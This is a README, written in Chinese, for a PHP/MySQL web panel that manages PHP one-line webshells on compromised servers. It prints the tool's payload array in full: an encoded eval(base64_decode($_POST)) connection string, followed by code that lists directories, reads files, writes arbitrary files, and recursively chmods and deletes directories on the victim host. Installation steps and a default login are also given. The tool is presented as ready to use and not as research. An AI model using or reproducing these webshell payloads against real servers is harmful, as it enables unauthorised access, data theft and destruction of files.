WebshellManager
一款無聊的時候用PHP+Mysql寫的一句話WEB端管理工具 名字叫w8ay好了
介紹
- 目前僅支持對PHP的一句話進行操作
- 完成文件管理,支持對webshell中的文件進行增、刪、改、查操作 可多選操作
- 支持自定義命令
- 完成多用戶系統 註冊 登陸
##自定義PHP命令
第二版本完成了自定義命令 在include\model\PHPShell_Build_mothod.php
中自定義命令即可,將自動完成編碼加密過程
var $phpshell = array( 'link' => '{PASS}=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=',//連接前綴 'safe' => "@ini_set('display_errors','0');@set_time_limit(0);@set_magic_quotes_runtime(0);",//payload前綴 'flag_left' => 'echo("->|");',//左標誌位 'flag_right' => 'echo("|<-");die();',//右標誌位 'GetWebRoot' => '$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D==""){$D=dirname($_SERVER["PATH_TRANSLATED"]);}$arr = array("WebRoot" => $D);echo json_encode($arr);',//獲取一句話目錄 'GetWebDiskFileList' => '$D=base64_decode($_POST["z1"]);$F=opendir($D); if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$tmparr = array(); while($N=readdir($F)){$P=$D."/".$N;$T=date("Y-m-d H:i:s",filemtime($P));$E=substr(base_convert(fileperms($P),10,8),-4);$arr = array("time" => $T, "size" => filesize($P),"root" => $E,"path" =>urlencode(is_dir($P)?$N."/":$N));$tmparr[] = $arr;}echo json_encode($tmparr);closedir($F);};',//獲取磁盤文件 'GetWebFileContent' => '$F=base64_decode($_POST["z1"]);$P=@fopen($F,"r");echo(@fread($P,filesize($F)));@fclose($P);',//得到文件內容 'CreateAndSaveFile' => 'echo @fwrite(fopen(base64_decode($_POST["z1"]),"w"),base64_decode($_POST["z2"]))?"1":"0";',//創建文件 'DeleteFile' => 'function df($p){$m=@dir($p);while(@$f=$m->read()){$pf=$p."/".$f;if((is_dir($pf))&&($f!=".")&&($f!="..")){@chmod($pf,0777);df($pf);}if(is_file($pf)){@chmod($pf,0777);@unlink($pf);}}$m->close();@chmod($p,0777);return @rmdir($p);}$F=get_magic_quotes_gpc()?stripslashes($_POST["z1"]):$_POST["z1"];if(is_dir($F))echo(df($F));else{echo(file_exists($F)?@unlink($F)?"1":"0":"0");}',//刪除文件 );
截圖
安裝
- 導入文件中的 w8_webshell.sql
- 按註釋修改 config.php
- 安裝成功
- 默認賬號密碼 [email protected] w8ay